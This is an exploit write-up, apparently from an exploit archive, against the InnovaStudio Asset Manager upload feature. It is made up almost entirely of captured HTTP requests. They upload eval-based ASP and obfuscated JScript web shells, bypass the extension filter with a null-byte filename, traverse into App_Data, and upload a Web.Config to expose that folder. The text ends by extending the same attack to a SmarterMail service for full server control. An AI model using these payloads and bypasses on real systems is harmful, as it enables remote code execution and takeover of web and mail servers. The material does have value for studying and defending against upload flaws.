# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 (ASSET MANAGER) Unrestricted File Upload / Directory Traversal / Multiple WebApps Exploit # Date: 11/04/2023 # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # Vendor Homepage: innovastudio.com # Product: Asset Manager # Version: <= Asset Manager ASP Version 5.4 # Tested on: Windows 10 and Windows Server 2019 # CVE : 0DAY ################################################################################################## # # # ASP version, in i_upload_object_FSO.asp, line 234 # # # # oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" # # # ################################################################################################## ||==============================================================================|| || ((((1)))) || || || || ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... || ||==============================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0644 ] " " " " DIR PERMISSIONS : [ 0755 ] " " " " UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " ################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.asp" Content-Type: application/octet-stream <%eval request("#11")%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " ...[ RESPONCE ]... " " " " ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. " " " ================================================================================================== *** ||================================================================================|| || ((((2)))) || || || || ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... || || || ||================================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0644 ] " " " " DIR PERMISSIONS : [ 0755 ] " " " " UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " ################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt" Content-Type: application/octet-stream <%eval request("#11")%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " >>> filename="shell.asp%00asp.txt" <<< " " " " [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode " " " " or " " " " CTRL+Shift+U " " " " SEND! " " " ================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] " " " " SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] " " " ================================================================================================== *** ||==============================================================================|| || ((((3)))) || || || || ...:::NO WRITE PERMISSION!:::... || || || || ...:::Directory Traversal:::... || || || ||==============================================================================|| ################################################################################################## " " " FILE PERMISSIONS : [ 0600 ] " " " " DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] " " " " OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] " " " " DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " " " " App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] " " " " TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] " " " " " ################################################################################################## ########################################################################################################################################################## # # # What is the App_Data Folder useful? # # App_Data contains application data files including .mdf database files, XML files, and other data store files. # # The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. # # The App_Data folder is not public like the other website directories under the Home Directory. # # Because it's a private directory, the IIS server hides it for security reasons. # # Now, we will test whether such a directory exists. # # If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. # # For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. # # So the directory will be public and it will be able to respond to external queries and run a shell. # # # ########################################################################################################################################################## ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt" Content-Type: application/octet-stream ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] " " " " TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] " " " ================================================================================================== # Now we will upload your shell to the directory where we made ByPass. # ================================================================================================== POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 Host: www.pentest.com Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG Content-Length: 473 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.pentest.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpCurrFolder2" C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="inpFilter" ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt" Content-Type: application/octet-stream <%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> <%var PAY:String= Request["\x61\x62\x63\x64"];eval (PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%> ------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- ====================================================================================================== " ...[ RESPONCE ]... " " " " OK! " " " " UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] " " " " TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] " " " ========================================================================================================================================== " " " So what can we do if no directory on the site has write permission? " " If not, we will test for vulnerabilities in the paths of other applications running on the server. " " Sometimes this can be a mail service related vulnerability, " " Sometimes also it can be a "Service Permissions" vulnerability. " " Sometimes also it can be a "Binary Permissions " vulnerability. " " Sometimes also it can be a "Weak Service Permissions" vulnerability. " " Sometimes also it can be a "Unquoted Service Path" vulnerability. " " Our limits are as much as our imagination... " " *** 0DAY *** " " Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. " " We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. " " TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] " " Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] " " As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, " " And then upload our shell file to the server by bypassing it. " " This way, we will have full control over both the server and the mail service. " " Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] " " " ==========================================================================================================================================